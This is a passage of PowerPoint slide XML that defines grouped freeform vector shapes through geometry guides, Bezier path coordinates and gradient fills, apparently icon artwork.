                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFEC61E-FE67-4DF8-A542-B7080788536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2" y="1875"/>
                <a:ext cx="93" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 156"/>
                  <a:gd name="T1" fmla="*/ 0 h 88"/>
                  <a:gd name="T2" fmla="*/ 0 w 156"/>
                  <a:gd name="T3" fmla="*/ 48 h 88"/>
                  <a:gd name="T4" fmla="*/ 156 w 156"/>
                  <a:gd name="T5" fmla="*/ 88 h 88"/>
                  <a:gd name="T6" fmla="*/ 156 w 156"/>
                  <a:gd name="T7" fmla="*/ 43 h 88"/>
                  <a:gd name="T8" fmla="*/ 0 w 156"/>
                  <a:gd name="T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88">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="43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636" name="Group 619">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A94C6D-3354-437F-BCD6-A1F46904898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113001" y="3839056"/>
              <a:ext cx="247396" cy="254804"/>
              <a:chOff x="62" y="-4113"/>
              <a:chExt cx="980" cy="1008"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1047" name="Freeform 620">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52008919-509D-4EBD-AA15-4BD6128F239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6" y="-3816"/>
                <a:ext cx="916" cy="711"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 388"/>
                  <a:gd name="T1" fmla="*/ 0 h 301"/>
                  <a:gd name="T2" fmla="*/ 196 w 388"/>
                  <a:gd name="T3" fmla="*/ 0 h 301"/>
                  <a:gd name="T4" fmla="*/ 20 w 388"/>
                  <a:gd name="T5" fmla="*/ 108 h 301"/>
                  <a:gd name="T6" fmla="*/ 5 w 388"/>
                  <a:gd name="T7" fmla="*/ 250 h 301"/>
                  <a:gd name="T8" fmla="*/ 196 w 388"/>
                  <a:gd name="T9" fmla="*/ 301 h 301"/>
                  <a:gd name="T10" fmla="*/ 388 w 388"/>
                  <a:gd name="T11" fmla="*/ 51 h 301"/>
                  <a:gd name="T12" fmla="*/ 196 w 388"/>
                  <a:gd name="T13" fmla="*/ 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8" h="301">
                    <a:moveTo>
                      <a:pt x="196" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="0"/>
                      <a:pt x="196" y="0"/>
                      <a:pt x="196" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="0"/>
                      <a:pt x="47" y="29"/>
                      <a:pt x="20" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="168"/>
                      <a:pt x="5" y="250"/>
                      <a:pt x="5" y="250"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="301"/>
                      <a:pt x="196" y="301"/>
                      <a:pt x="196" y="301"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="51"/>
                      <a:pt x="388" y="51"/>
                      <a:pt x="388" y="51"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19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48" name="Freeform 621">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2EDE9FF-ECFB-48C0-A20F-8BFC22ECF14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73" y="-3799"/>
                <a:ext cx="501" cy="137"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 501"/>
                  <a:gd name="T1" fmla="*/ 28 h 137"/>
                  <a:gd name="T2" fmla="*/ 106 w 501"/>
                  <a:gd name="T3" fmla="*/ 0 h 137"/>
                  <a:gd name="T4" fmla="*/ 501 w 501"/>
                  <a:gd name="T5" fmla="*/ 106 h 137"/>
                  <a:gd name="T6" fmla="*/ 397 w 501"/>
                  <a:gd name="T7" fmla="*/ 137 h 137"/>
                  <a:gd name="T8" fmla="*/ 0 w 501"/>
                  <a:gd name="T9" fmla="*/ 28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1" h="137">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="501" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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49" name="Freeform 622">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9360C0-30E0-4734-9DC6-30F933A8246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2" y="-3256"/>
                <a:ext cx="503" cy="137"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 503"/>
                  <a:gd name="T1" fmla="*/ 29 h 137"/>
                  <a:gd name="T2" fmla="*/ 106 w 503"/>
                  <a:gd name="T3" fmla="*/ 0 h 137"/>
                  <a:gd name="T4" fmla="*/ 503 w 503"/>
                  <a:gd name="T5" fmla="*/ 106 h 137"/>
                  <a:gd name="T6" fmla="*/ 397 w 503"/>
                  <a:gd name="T7" fmla="*/ 137 h 137"/>
                  <a:gd name="T8" fmla="*/ 0 w 503"/>
                  <a:gd name="T9" fmla="*/ 29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3" h="137">
                    <a:moveTo>
                      <a:pt x="0" y="29"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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0" name="Freeform 623">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D99C0AB4-A529-433C-8F91-1C122AA4C71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68" y="-3310"/>
                <a:ext cx="397" cy="160"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 397"/>
                  <a:gd name="T1" fmla="*/ 54 h 160"/>
                  <a:gd name="T2" fmla="*/ 0 w 397"/>
                  <a:gd name="T3" fmla="*/ 0 h 160"/>
                  <a:gd name="T4" fmla="*/ 397 w 397"/>
                  <a:gd name="T5" fmla="*/ 109 h 160"/>
                  <a:gd name="T6" fmla="*/ 397 w 397"/>
                  <a:gd name="T7" fmla="*/ 160 h 160"/>
                  <a:gd name="T8" fmla="*/ 0 w 397"/>
                  <a:gd name="T9" fmla="*/ 5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7" h="160">
                    <a:moveTo>
                      <a:pt x="0" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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1" name="Freeform 624">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511E5630-E3B5-47D9-9A67-9BC4DB8212A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0" y="-4113"/>
                <a:ext cx="468" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 468"/>
                  <a:gd name="T1" fmla="*/ 356 h 451"/>
                  <a:gd name="T2" fmla="*/ 132 w 468"/>
                  <a:gd name="T3" fmla="*/ 0 h 451"/>
                  <a:gd name="T4" fmla="*/ 468 w 468"/>
                  <a:gd name="T5" fmla="*/ 92 h 451"/>
                  <a:gd name="T6" fmla="*/ 338 w 468"/>
                  <a:gd name="T7" fmla="*/ 451 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 468"/>
                  <a:gd name="T9" fmla="*/ 356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8" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="356"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35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2" name="Freeform 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD558B2C-0B49-4D13-8ABA-41F7475122A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7" y="-3695"/>
                <a:ext cx="465" cy="590"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 197"/>
                  <a:gd name="T1" fmla="*/ 250 h 250"/>
                  <a:gd name="T2" fmla="*/ 20 w 197"/>
                  <a:gd name="T3" fmla="*/ 109 h 250"/>
                  <a:gd name="T4" fmla="*/ 197 w 197"/>
                  <a:gd name="T5" fmla="*/ 0 h 250"/>
                  <a:gd name="T6" fmla="*/ 197 w 197"/>
                  <a:gd name="T7" fmla="*/ 199 h 250"/>
                  <a:gd name="T8" fmla="*/ 5 w 197"/>
                  <a:gd name="T9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7" h="250">
                    <a:moveTo>
                      <a:pt x="5" y="250"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="250"/>
                      <a:pt x="0" y="168"/>
                      <a:pt x="20" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="29"/>
                      <a:pt x="197" y="0"/>
                      <a:pt x="197" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="199"/>
                      <a:pt x="197" y="199"/>
                      <a:pt x="197" y="199"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="5" y="25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637" name="Group 595">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87748733-117B-4FE2-B877-584E9BF0FEF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892271" y="3855351"/>
              <a:ext cx="229619" cy="357022"/>
              <a:chOff x="2363" y="1132"/>
              <a:chExt cx="343" cy="529"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1042" name="Freeform 596">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EC1D7C2-EB80-4DF0-95CF-266C4CE0F2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74" y="1449"/>
                <a:ext cx="145" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                  <a:gd name="T1" fmla="*/ 36 h 140"/>
                  <a:gd name="T2" fmla="*/ 108 w 108"/>
                  <a:gd name="T3" fmla="*/ 35 h 140"/>
                  <a:gd name="T4" fmla="*/ 108 w 108"/>
                  <a:gd name="T5" fmla="*/ 28 h 140"/>
                  <a:gd name="T6" fmla="*/ 108 w 108"/>
                  <a:gd name="T7" fmla="*/ 23 h 140"/>
                  <a:gd name="T8" fmla="*/ 108 w 108"/>
                  <a:gd name="T9" fmla="*/ 22 h 140"/>
                  <a:gd name="T10" fmla="*/ 108 w 108"/>
                  <a:gd name="T11" fmla="*/ 17 h 140"/>
                  <a:gd name="T12" fmla="*/ 108 w 108"/>
                  <a:gd name="T13" fmla="*/ 16 h 140"/>
                  <a:gd name="T14" fmla="*/ 108 w 108"/>
                  <a:gd name="T15" fmla="*/ 16 h 140"/>
                  <a:gd name="T16" fmla="*/ 89 w 108"/>
                  <a:gd name="T17" fmla="*/ 7 h 140"/>
                  <a:gd name="T18" fmla="*/ 64 w 108"/>
                  <a:gd name="T19" fmla="*/ 2 h 140"/>
                  <a:gd name="T20" fmla="*/ 57 w 108"/>
                  <a:gd name="T21" fmla="*/ 4 h 140"/>
                  <a:gd name="T22" fmla="*/ 49 w 108"/>
                  <a:gd name="T23" fmla="*/ 6 h 140"/>
                  <a:gd name="T24" fmla="*/ 49 w 108"/>
                  <a:gd name="T25" fmla="*/ 6 h 140"/>
                  <a:gd name="T26" fmla="*/ 0 w 108"/>
                  <a:gd name="T27" fmla="*/ 18 h 140"/>
                  <a:gd name="T28" fmla="*/ 29 w 108"/>
                  <a:gd name="T29" fmla="*/ 47 h 140"/>
                  <a:gd name="T30" fmla="*/ 62 w 108"/>
                  <a:gd name="T31" fmla="*/ 40 h 140"/>
                  <a:gd name="T32" fmla="*/ 62 w 108"/>
                  <a:gd name="T33" fmla="*/ 118 h 140"/>
                  <a:gd name="T34" fmla="*/ 101 w 108"/>
                  <a:gd name="T35" fmla="*/ 129 h 140"/>
                  <a:gd name="T36" fmla="*/ 108 w 108"/>
                  <a:gd name="T37" fmla="*/ 117 h 140"/>
                  <a:gd name="T38" fmla="*/ 108 w 108"/>
                  <a:gd name="T39" fmla="*/ 36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8" h="140">
                    <a:moveTo>
                      <a:pt x="108" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="33"/>
                      <a:pt x="108" y="30"/>
                      <a:pt x="108" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="28"/>
                      <a:pt x="108" y="26"/>
                      <a:pt x="108" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="23"/>
                      <a:pt x="108" y="22"/>
                      <a:pt x="108" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="21"/>
                      <a:pt x="108" y="19"/>
                      <a:pt x="108" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="4"/>
                      <a:pt x="95" y="8"/>
                      <a:pt x="89" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="6"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="64" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="3"/>
                      <a:pt x="57" y="4"/>
                      <a:pt x="57" y="4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67"/>
                      <a:pt x="62" y="109"/>
                      <a:pt x="62" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="138"/>
                      <a:pt x="89" y="140"/>
                      <a:pt x="101" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="126"/>
                      <a:pt x="108" y="122"/>
                      <a:pt x="108" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="101"/>
                      <a:pt x="107" y="69"/>
                      <a:pt x="108" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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43" name="Freeform 597">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C180A2E0-CF1F-4C8F-A581-94F9B6360D2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18" y="1435"/>
                <a:ext cx="267" cy="226"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 197"/>
                  <a:gd name="T1" fmla="*/ 44 h 167"/>
                  <a:gd name="T2" fmla="*/ 196 w 197"/>
                  <a:gd name="T3" fmla="*/ 37 h 167"/>
                  <a:gd name="T4" fmla="*/ 177 w 197"/>
                  <a:gd name="T5" fmla="*/ 18 h 167"/>
                  <a:gd name="T6" fmla="*/ 137 w 197"/>
                  <a:gd name="T7" fmla="*/ 25 h 167"/>
                  <a:gd name="T8" fmla="*/ 99 w 197"/>
                  <a:gd name="T9" fmla="*/ 35 h 167"/>
                  <a:gd name="T10" fmla="*/ 99 w 197"/>
                  <a:gd name="T11" fmla="*/ 52 h 167"/>
                  <a:gd name="T12" fmla="*/ 99 w 197"/>
                  <a:gd name="T13" fmla="*/ 35 h 167"/>
                  <a:gd name="T14" fmla="*/ 99 w 197"/>
                  <a:gd name="T15" fmla="*/ 35 h 167"/>
                  <a:gd name="T16" fmla="*/ 99 w 197"/>
                  <a:gd name="T17" fmla="*/ 2 h 167"/>
                  <a:gd name="T18" fmla="*/ 89 w 197"/>
                  <a:gd name="T19" fmla="*/ 14 h 167"/>
                  <a:gd name="T20" fmla="*/ 2 w 197"/>
                  <a:gd name="T21" fmla="*/ 8 h 167"/>
                  <a:gd name="T22" fmla="*/ 2 w 197"/>
                  <a:gd name="T23" fmla="*/ 10 h 167"/>
                  <a:gd name="T24" fmla="*/ 2 w 197"/>
                  <a:gd name="T25" fmla="*/ 31 h 167"/>
                  <a:gd name="T26" fmla="*/ 12 w 197"/>
                  <a:gd name="T27" fmla="*/ 67 h 167"/>
                  <a:gd name="T28" fmla="*/ 70 w 197"/>
                  <a:gd name="T29" fmla="*/ 83 h 167"/>
                  <a:gd name="T30" fmla="*/ 83 w 197"/>
                  <a:gd name="T31" fmla="*/ 82 h 167"/>
                  <a:gd name="T32" fmla="*/ 149 w 197"/>
                  <a:gd name="T33" fmla="*/ 65 h 167"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 137 h 167"/>
                  <a:gd name="T36" fmla="*/ 150 w 197"/>
                  <a:gd name="T37" fmla="*/ 141 h 167"/>
                  <a:gd name="T38" fmla="*/ 197 w 197"/>
                  <a:gd name="T39" fmla="*/ 140 h 167"/>
                  <a:gd name="T40" fmla="*/ 196 w 197"/>
                  <a:gd name="T41" fmla="*/ 4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7" h="167">
                    <a:moveTo>
                      <a:pt x="196" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="44"/>
                      <a:pt x="196" y="40"/>
                      <a:pt x="196" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="23"/>
                      <a:pt x="183" y="19"/>
                      <a:pt x="177" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="17"/>
                      <a:pt x="137" y="25"/>
                      <a:pt x="137" y="2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20"/>
                      <a:pt x="99" y="4"/>
                      <a:pt x="99" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="8"/>
                      <a:pt x="95" y="13"/>
                      <a:pt x="89" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="16"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="2" y="8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55"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="12" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="69"/>
                      <a:pt x="66" y="82"/>
                      <a:pt x="70" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="83"/>
                      <a:pt x="78" y="84"/>
                      <a:pt x="83" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="78"/>
                      <a:pt x="127" y="71"/>
                      <a:pt x="149" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="138"/>
                      <a:pt x="150" y="140"/>
                      <a:pt x="150" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="167"/>
                      <a:pt x="196" y="163"/>
                      <a:pt x="197" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="125"/>
                      <a:pt x="196" y="60"/>
                      <a:pt x="196" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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44" name="Freeform 598">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA01E5D0-9FEE-420F-9F26-4839DBC377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363" y="1229"/>
                <a:ext cx="343" cy="269"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 254"/>
                  <a:gd name="T1" fmla="*/ 119 h 200"/>
                  <a:gd name="T2" fmla="*/ 184 w 254"/>
                  <a:gd name="T3" fmla="*/ 127 h 200"/>
                  <a:gd name="T4" fmla="*/ 173 w 254"/>
                  <a:gd name="T5" fmla="*/ 55 h 200"/>
                  <a:gd name="T6" fmla="*/ 144 w 254"/>
                  <a:gd name="T7" fmla="*/ 27 h 200"/>
                  <a:gd name="T8" fmla="*/ 96 w 254"/>
                  <a:gd name="T9" fmla="*/ 14 h 200"/>
                  <a:gd name="T10" fmla="*/ 51 w 254"/>
                  <a:gd name="T11" fmla="*/ 2 h 200"/>
                  <a:gd name="T12" fmla="*/ 18 w 254"/>
                  <a:gd name="T13" fmla="*/ 13 h 200"/>
                  <a:gd name="T14" fmla="*/ 3 w 254"/>
                  <a:gd name="T15" fmla="*/ 96 h 200"/>
                  <a:gd name="T16" fmla="*/ 3 w 254"/>
                  <a:gd name="T17" fmla="*/ 96 h 200"/>
                  <a:gd name="T18" fmla="*/ 2 w 254"/>
                  <a:gd name="T19" fmla="*/ 99 h 200"/>
                  <a:gd name="T20" fmla="*/ 2 w 254"/>
                  <a:gd name="T21" fmla="*/ 99 h 200"/>
                  <a:gd name="T22" fmla="*/ 9 w 254"/>
                  <a:gd name="T23" fmla="*/ 118 h 200"/>
                  <a:gd name="T24" fmla="*/ 26 w 254"/>
                  <a:gd name="T25" fmla="*/ 119 h 200"/>
                  <a:gd name="T26" fmla="*/ 33 w 254"/>
                  <a:gd name="T27" fmla="*/ 117 h 200"/>
                  <a:gd name="T28" fmla="*/ 33 w 254"/>
                  <a:gd name="T29" fmla="*/ 117 h 200"/>
                  <a:gd name="T30" fmla="*/ 36 w 254"/>
                  <a:gd name="T31" fmla="*/ 116 h 200"/>
                  <a:gd name="T32" fmla="*/ 43 w 254"/>
                  <a:gd name="T33" fmla="*/ 114 h 200"/>
                  <a:gd name="T34" fmla="*/ 44 w 254"/>
                  <a:gd name="T35" fmla="*/ 76 h 200"/>
                  <a:gd name="T36" fmla="*/ 41 w 254"/>
                  <a:gd name="T37" fmla="*/ 77 h 200"/>
                  <a:gd name="T38" fmla="*/ 44 w 254"/>
                  <a:gd name="T39" fmla="*/ 53 h 200"/>
                  <a:gd name="T40" fmla="*/ 43 w 254"/>
                  <a:gd name="T41" fmla="*/ 171 h 200"/>
                  <a:gd name="T42" fmla="*/ 53 w 254"/>
                  <a:gd name="T43" fmla="*/ 183 h 200"/>
                  <a:gd name="T44" fmla="*/ 111 w 254"/>
                  <a:gd name="T45" fmla="*/ 199 h 200"/>
                  <a:gd name="T46" fmla="*/ 140 w 254"/>
                  <a:gd name="T47" fmla="*/ 177 h 200"/>
                  <a:gd name="T48" fmla="*/ 140 w 254"/>
                  <a:gd name="T49" fmla="*/ 171 h 200"/>
                  <a:gd name="T50" fmla="*/ 140 w 254"/>
                  <a:gd name="T51" fmla="*/ 139 h 200"/>
                  <a:gd name="T52" fmla="*/ 139 w 254"/>
                  <a:gd name="T53" fmla="*/ 98 h 200"/>
                  <a:gd name="T54" fmla="*/ 137 w 254"/>
                  <a:gd name="T55" fmla="*/ 84 h 200"/>
                  <a:gd name="T56" fmla="*/ 136 w 254"/>
                  <a:gd name="T57" fmla="*/ 79 h 200"/>
                  <a:gd name="T58" fmla="*/ 137 w 254"/>
                  <a:gd name="T59" fmla="*/ 84 h 200"/>
                  <a:gd name="T60" fmla="*/ 139 w 254"/>
                  <a:gd name="T61" fmla="*/ 98 h 200"/>
                  <a:gd name="T62" fmla="*/ 145 w 254"/>
                  <a:gd name="T63" fmla="*/ 136 h 200"/>
                  <a:gd name="T64" fmla="*/ 145 w 254"/>
                  <a:gd name="T65" fmla="*/ 137 h 200"/>
                  <a:gd name="T66" fmla="*/ 145 w 254"/>
                  <a:gd name="T67" fmla="*/ 137 h 200"/>
                  <a:gd name="T68" fmla="*/ 145 w 254"/>
                  <a:gd name="T69" fmla="*/ 142 h 200"/>
                  <a:gd name="T70" fmla="*/ 155 w 254"/>
                  <a:gd name="T71" fmla="*/ 165 h 200"/>
                  <a:gd name="T72" fmla="*/ 170 w 254"/>
                  <a:gd name="T73" fmla="*/ 171 h 200"/>
                  <a:gd name="T74" fmla="*/ 223 w 254"/>
                  <a:gd name="T75" fmla="*/ 155 h 200"/>
                  <a:gd name="T76" fmla="*/ 209 w 254"/>
                  <a:gd name="T77" fmla="*/ 119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4" h="200">
                    <a:moveTo>
                      <a:pt x="209" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="121"/>
                      <a:pt x="197" y="123"/>
                      <a:pt x="184" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="94"/>
                      <a:pt x="175" y="64"/>
                      <a:pt x="173" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="36"/>
                      <a:pt x="153" y="30"/>
                      <a:pt x="144" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="23"/>
                      <a:pt x="110" y="18"/>
                      <a:pt x="96" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="10"/>
                      <a:pt x="61" y="4"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="18" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="16"/>
                      <a:pt x="10" y="56"/>
                      <a:pt x="3" y="96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0" y="109"/>
                      <a:pt x="4" y="116"/>
                      <a:pt x="9" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="121"/>
                      <a:pt x="20" y="120"/>
                      <a:pt x="26" y="119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34" y="117"/>
                      <a:pt x="35" y="117"/>
                      <a:pt x="36" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="116"/>
                      <a:pt x="41" y="115"/>
                      <a:pt x="43" y="114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3" y="76"/>
                      <a:pt x="42" y="77"/>
                      <a:pt x="41" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="60"/>
                      <a:pt x="44" y="49"/>
                      <a:pt x="44" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="59"/>
                      <a:pt x="43" y="123"/>
                      <a:pt x="43" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="177"/>
                      <a:pt x="47" y="182"/>
                      <a:pt x="53" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="102" y="197"/>
                      <a:pt x="111" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="200"/>
                      <a:pt x="138" y="190"/>
                      <a:pt x="140" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="175"/>
                      <a:pt x="140" y="173"/>
                      <a:pt x="140" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="124"/>
                      <a:pt x="140" y="111"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="92"/>
                      <a:pt x="137" y="87"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
